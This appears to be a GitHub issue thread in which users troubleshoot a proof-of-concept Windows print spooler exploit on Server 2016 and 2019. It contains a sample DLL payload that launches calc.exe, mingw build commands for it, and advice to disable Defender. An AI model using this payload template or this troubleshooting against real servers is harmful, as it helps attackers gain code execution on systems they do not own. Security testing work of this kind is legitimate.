What settings do I need for the Windows server environment
duongdt21 opened this issue · 12 comments
I did it on virtualized environment using the Poc you provided. However it always ends with "Stage0:0". Am I missing any step? When using process monitor I see my dll has been included but nothing happens. Thank you very much.
try use x64 payload
yes i'm using windows server 2016 and x64 payload
try disable defender
I also turned it off. When I print exception, it shows error: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
What path print script in pDriverPath section? Does this path exist on system?
pDriverPath found in my windows. While running poc my dll file was also written to System32/spool/drivers/x64/3.
magic!
try use my dll-payload:
#include <windows.h>
int owned()
{
WinExec("cmd.exe /c \"calc.exe\"",0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
owned();
return 0;
}
Linux build:
x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL test.cpp
x86_64-w64-mingw32-g++ -shared -o test.dll test.o -Wl,--out-implib,test.a
find process:
calc.exe or win32calc.exe
I also turned it off. When I print exception, it shows error: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND,same problem,how to solve?
I used your Poc dll. However it still gives error :( Can I ask for the version of Windows you use test ?
windows server 2016 and windows server 2019
Yes. I am also using windows 2019 10.0.17763.737 :((
See #25